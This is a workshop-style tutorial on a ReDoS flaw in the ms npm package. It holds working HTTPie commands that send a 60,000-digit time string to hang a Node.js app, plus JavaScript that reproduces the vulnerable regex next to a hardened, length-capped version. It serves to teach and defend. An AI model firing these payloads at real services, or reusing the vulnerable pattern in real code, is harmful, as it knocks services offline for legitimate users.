Example 3

Our third example vulnerability is in the ms npm package, a small module that converts human-readable time strings into milliseconds. The issue is that our application depends on ms@0.6.2, whose parsing regular expression has a Regular Expression Denial of Service (ReDoS) vulnerability: on certain inputs the regex engine backtracks for a time that grows much faster than the length of the input.

The package takes a string such as "20 minutes" and parses it into a number of milliseconds, which our application then uses to schedule a reminder. For example, the request below creates a reminder from the text "Reboot server in 20 minutes".

To demonstrate this vulnerability, we will move to the terminal. Let's run the following command against our application:

echo 'content=Reboot server in 20 minutes' | http --form $GOOF_HOST/create -v

The result will be console output similar to this:

POST /create HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 36
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Host: elb.amazonaws.com
User-Agent: HTTPie/2.1.0
content=Reboot server in 20 minutes
HTTP/1.1 302 Found
Connection: keep-alive
Content-Length: 28
Content-Type: text/html; charset=utf-8
Date: Sat, 13 Jun 2020 21:20:16 GMT
ETag: W/"1c-41a86905"
Location: /
Vary: X-HTTP-Method-Override
X-Powered-By: Express

A corresponding web result will look like this:

Now we will take the previous command but replace the 20 with the digit 5 printed 60,000 times. The regular expression that ms uses to separate the number from the unit can take a non-linear amount of time to process an input: the longer the input, the longer the processing time. Let's run the following command (the `{1..60000}` brace expansion requires bash or zsh):

echo 'content=Reboot server in '$(printf "%.0s5" {1..60000})' minutes' | http --form $GOOF_HOST/create -v

The result here is surprisingly fast. That is because the input still matches: the regex finds a valid split between the digits and the unit on its first attempt and never has to backtrack. However, what happens when the regular expression does not match? To illustrate this, let's take the same command and swap the s in minutes for an a instead. Type the following command:

echo 'content=Reboot server in '$(printf "%.0s5" {1..60000})' minutea' | http --form $GOOF_HOST/create -v

This command will take a long time to process and leaves the application unresponsive. Because "minutea" is not a valid unit, the regex engine has to try every way of splitting the 60,000 digits between the digit groups in the pattern before it can conclude that there is no match, and since Node.js evaluates the regex on its single event-loop thread, no other request is served while it does so. If you try to add or remove tasks the application will not respond: a single crafted request has blocked legitimate requests from processing. The remedy is to upgrade ms to a patched release, which rejects over-long input before the regular expression ever runs.
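The following is an added example, not code from the Goof application or from the ms package itself. The vulnerable regex is modelled on the parser in ms@0.6.2 (the number part `((?:\d+)?\.?\d+)` is the problematic piece), and the hardened version applies the two fixes a reviewer would ask for: a length cap before the regex runs (the assumed `MAX_LEN` of 100 is illustrative) and a number pattern in which a run of digits has only one possible parse. The `payload` helper builds the same "5 repeated n times" string the commands above send, so the matching and non-matching cases can be timed side by side at a size that finishes quickly.

```javascript
// Added example, not code from the Goof application or from the ms package.
// VULNERABLE_RE is modelled on the parser regex in ms@0.6.2: the number part
// `((?:\d+)?\.?\d+)` contains two adjacent digit groups, so a run of n digits
// can be split between them in O(n) ways, and when the unit at the end does
// not match the engine retries every split before it gives up (O(n^2) work).
const s = 1000, m = s * 60, h = m * 60, d = h * 24, y = d * 365.25;
const UNITS = '(ms|seconds?|s|minutes?|m|hours?|h|days?|d|years?|y)?';

const VULNERABLE_RE = new RegExp('^((?:\\d+)?\\.?\\d+) *' + UNITS + '$', 'i');
// Hardened pattern: a digit run has exactly one parse, so a failed match
// backtracks O(n) steps instead of O(n^2).
const SAFE_RE = new RegExp('^(\\d+(?:\\.\\d+)?|\\.\\d+) *' + UNITS + '$', 'i');
// Assumed cap (illustrative value). Rejecting over-long input before the
// regex runs is the defence-in-depth step; a reminder never needs 100 chars.
const MAX_LEN = 100;

function toMs(n, unit) {
  switch (unit) {
    case 'years': case 'year': case 'y': return n * y;
    case 'days': case 'day': case 'd': return n * d;
    case 'hours': case 'hour': case 'h': return n * h;
    case 'minutes': case 'minute': case 'm': return n * m;
    case 'seconds': case 'second': case 's': return n * s;
    default: return n; // 'ms'
  }
}

// Behaves like ms@0.6.2: no length check and a backtracking-prone regex.
function vulnerableParse(str) {
  const match = VULNERABLE_RE.exec(String(str));
  if (!match) return undefined;
  return toMs(parseFloat(match[1]), (match[2] || 'ms').toLowerCase());
}

// Hardened: length cap first, then the unambiguous pattern.
function hardenedParse(str) {
  str = String(str);
  if (str.length > MAX_LEN) return undefined;
  const match = SAFE_RE.exec(str);
  if (!match) return undefined;
  return toMs(parseFloat(match[1]), (match[2] || 'ms').toLowerCase());
}

// The time portion of the workshop payload: the digit 5 repeated n times,
// followed by a unit ('minutes' matches, 'minutea' does not).
function payload(n, unit) {
  return '5'.repeat(n) + ' ' + unit;
}

// Wall-clock milliseconds for a single parse call.
function timeParse(fn, input) {
  const start = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

if (typeof require !== 'undefined' && require.main === module) {
  // Doubling n roughly quadruples the non-matching time for the vulnerable
  // parser, while the matching case and the hardened parser stay flat.
  for (const n of [500, 1000, 2000]) {
    console.log(
      `n=${n}`,
      `match: ${timeParse(vulnerableParse, payload(n, 'minutes')).toFixed(1)} ms,`,
      `no match: ${timeParse(vulnerableParse, payload(n, 'minutea')).toFixed(1)} ms,`,
      `hardened no match: ${timeParse(hardenedParse, payload(n, 'minutea')).toFixed(2)} ms`,
    );
  }
}
```

Note that the length cap alone already defeats the 60,000-digit payload, which is why it is the cheapest fix to apply; rewriting the pattern additionally protects inputs that are under the cap but still long enough to be noticeable under load.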